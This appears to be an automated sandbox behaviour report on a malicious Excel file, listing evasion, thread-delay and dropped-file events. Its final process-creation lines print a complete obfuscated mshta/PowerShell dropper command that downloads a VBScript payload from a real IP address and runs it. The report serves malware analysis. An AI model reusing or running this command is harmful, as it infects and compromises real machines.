Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Source: Euro confirmation Sp.xls	Stream path 'MBD00609F23/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: Euro confirmation Sp.xls	Stream path 'Workbook' entropy: 7.99857198207 (max. 8.0)
Source: ~DF634BD35CC9B94982.TMP.0.dr	Stream path 'MBD00609F23/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: ~DF634BD35CC9B94982.TMP.0.dr	Stream path 'Workbook' entropy: 7.99857198207 (max. 8.0)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 7_2_000007FE899C2C63 sldt ax

7_2_000007FE899C2C63

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2971	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6977	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1112	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8730	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1821
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 728
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1560
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6453

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5djzgayy\5djzgayy.dll			Jump to dropped file

Source: C:\Windows\System32\mshta.exe TID: 3900	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4052	Thread sleep count: 2971 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4052	Thread sleep count: 6977 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3116	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3128	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1908	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2984	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2984	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2984	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 1216	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 808	Thread sleep count: 1821 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 928	Thread sleep count: 728 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3628	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2920	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1780	Thread sleep count: 1560 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3872	Thread sleep count: 6453 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3836	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3792	Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3792	Thread sleep time: -1800000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3792	Thread sleep time: -600000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3524	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 1732, type: MEMORYSTR

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9ECF.tmp" "c:\Users\user\AppData\Local\Temp\vlwyfswc\CSCD4E4666864B4048A31961A99612757D.TMP"	Jump to behavior
